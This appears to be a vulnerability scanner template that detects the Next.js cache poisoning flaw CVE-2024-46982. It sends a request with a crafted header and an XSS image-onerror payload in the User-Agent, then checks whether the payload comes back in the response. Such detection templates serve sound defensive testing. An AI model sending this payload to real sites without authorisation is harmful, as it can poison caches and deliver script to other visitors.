id: nextjs-cache-poisoning-cve-2024-46982
info:
  name: Next.js Cache Poisoning (CVE-2024-46982)
  author: Lercas
  severity: high
  description: |
    Next.js is vulnerable to cache poisoning, where SSR requests can be incorrectly cached as SSG.
  reference:
    - https://github.com/vercel/next.js/security/advisories/GHSA-gp8f-8m3g-qvj9
    - https://nvd.nist.gov/vuln/detail/CVE-2024-46982
  tags: nextjs,cache-poisoning,xss,dos
  
requests:
  - method: GET
    path:
      - "{{BaseURL}}/index?__nextDataReq=1"
    headers:
      User-Agent: "<img src=x onerror=alert('CVE-2024-46982')>"
      x-now-route-matches: "1"
    max-redirects: 2
    matchers:
      - type: word
        part: body
        words:
          - "<img src=x onerror=alert('CVE-2024-46982')>"
        condition: contains
      - type: status
        status:
          - 200
          - 304